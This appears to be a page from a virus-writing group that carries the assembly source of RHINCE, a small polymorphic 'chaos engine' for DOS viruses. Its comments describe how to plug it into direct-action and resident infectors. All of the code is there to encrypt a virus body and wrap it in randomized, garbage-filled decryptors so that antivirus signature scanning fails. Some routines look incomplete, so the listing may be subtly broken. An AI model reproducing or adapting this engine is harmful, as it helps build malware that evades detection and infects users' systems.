Virus Labs & Distribution
; RHINCE, The Rickety and Hardly Insidious yet New Chaos Engine, v1.0,
; By Rhincewind [Vlad]
; This here code is a tiny 100% table-driven engine styled after the DSCE.
; The big benefit of the DSCE approach is that you no longer have to keep
; track of a counter, pointer or any other register.
; Calling parameters:
; CX Length of code to encrypt
; DS:DX 32-bit pointer to code to encrypt
; BP Offset encrypted code will be run at.
; Return parameters:
; CX Length of decryptor + decrypted code
; DS:DX 32-bit pointer to encrypted code
; The engine is a mere 416 bytes in length. Like the MtE, it must be called
; at the same offset as in the assembled version. This requirement makes it
; a bit tougher to implement this engine in generic direct action infectors,
; as they will have to relocate CS:IP. For the structure of a resident
; infector it makes no difference. Also, the encrypted code will be placed
; directly after the engine, at the 'polycode' label. If this is inconvenient,
; simply move the label.
; I wrote this one to see how small an engine of this type can get, as
; the original DSCE is very much overweight. It's trivial to detect, but hey,
; it's still an engine.
; Rhince.
mut_eng: push dx
inc cx
shr cx,1
mov di, offset polycode
mov si, offset insert_table
mov word ptr [si-(insert_table-codelen)],cx
call get_rand
mov word ptr [si-(insert_table-seed)],ax
genstart: mov dx,9
gen_decryptor: call get_rand
and ax,0fh ;Bump this up for kicks.
do_cx_rnd: push ax
mov ax, (endgarbage-garbagetbl)/2
call rand_in_range
xchg ax,bx
add bx,bx
call word ptr [garbagetbl+bx]
pop ax
dec ax
jns do_cx_rnd
mov ax, 0c72eh
mov al, 06
mov word ptr [si],di
dec dx
jnz gen_decryptor
mov ax, 0ebh
mov cx,9
push cx
fill_er_up: call get_rand
loop fill_er_up
pop cx
push di
db 08dh,083h
dw -(offset polycode)
mov startptr,ax
sub ax, (end_decryptor-decryptor)
mov si, offset decryptor
mov bx, offset insert_table
fill_values: mov di, word ptr ds:[bx]
inc bx
inc bx
inc ax
inc ax
loop fill_values
pop di
pop si
mov cx, codelen
encrypt_loop: lodsw
xor ax, seed
loop encrypt_loop
mov cx, di
mov dx, offset polycode
sub cx,dx
rnd_onebyters: mov bx, offset onebyters
mov ax, (end_onebyters-onebyters)
xlat_stosb: call rand_in_range
_ret: ret
onebyters db 0fdh,0fch,0fbh,0f9h,0f8h,0f5h,0d7h,0cch
db 9fh,9eh,99h,98h,97h,96h,95h
db 40h,41h,42h,43h,45h,46h,47h,48h,49h,4ah,4bh,4dh,4eh,4fh
db 93h,92h,91h,90h,3fh,37h,2fh,27h
seg_overrides db 26h,2eh,36h,3eh
rnd_lds_les: call get_rand
jns no_override
mov ax, 4
mov bx, offset seg_overrides
call xlat_stosb
no_override: mov ax, (endfirstbytes-firstbytes)
mov bx, offset firstbytes
call xlat_stosb
xchg ax,cx
get_nother: call get_rand
test cl,1
jz no_sp_test
sp_test: mov ah,al
and ah,111000b
cmp ah,100000b
jz get_nother
no_sp_test: stosb
xchg bx,ax
call get_rand
mov bh,bl
and bh,11000111b
cmp bh,110b
jz two_extra
cmp bl, 0c0h
jae no_extra_bytes
cmp bl, 40h
jb no_extra_bytes
cmp bl, 80h
jb one_extra
two_extra: stosb
xchg ah,al
one_extra: stosb
no_extra_bytes: ret
firstbytes db 2,3,0ah,0bh,12h,13h,1ah,1bh,22h,23h,2ah,2bh,32h,33h,38h
db 39h,3ah,3bh,8ah,8bh
rnd_mov: call get_rand
and al,0fh
cmp al,0ch
jz rnd_mov
add al, 0b0h
xchg ax,bx
call get_rand
cmp bl,0b8h
jb one_extra
rnd_flowcontrol:mov ax, (end_flowcontrol-flowcontrol)
mov bx, offset flowcontrol
call xlat_stosb
xor al,al
flowcontrol db 70h,71h,72h,73h,74h,75h,76h,77h,78h,79h,7ah,7bh,7ch,7dh,7eh,7fh
db 0e0h,0e1h,0e2h,0e3h
rnd_mov2: mov ax, (end_mov_ops-mov_ops)
mov bx, offset mov_ops
call xlat_stosb
xchg ax,cx
call get_rand
jns no_inc
inc cx
mov byte ptr ds:[di-1],cl
jmp one_byte2
no_inc: stosb
one_byte2: stosw
mov_ops db 04h,0ch,14h,1ch,24h,2ch,34h,3ch,0a8h
rand_in_range: push bx
push dx
xchg ax,bx
call get_rand
xor dx,dx
div bx
xchg ax,dx
pop dx
pop bx
get_rand: in al,40h ;I'm not too worried about RNG prediction
xchg al,ah ;attacks against an engine so vulnerable
in al,40h ;to the easier things in life.
xor ax, 0FFFFh
org $-2
Randomize dw ?
mov randomize,ax
garbagetbl: dw offset rnd_onebyters
dw offset rnd_mov
dw offset rnd_lds_les
dw offset rnd_mov2
dw offset rnd_flowcontrol
decryptor: cld
mov si, 1234h
org $-2
startptr dw ?
mov cx, 1234h
org $-2
codelen dw ?
decryptloop: xor word ptr cs:[si], 1234h
org $-2
seed dw ?
loop decryptloop
dw 01ebh
db ?
insert_table: dw 9 dup (?)
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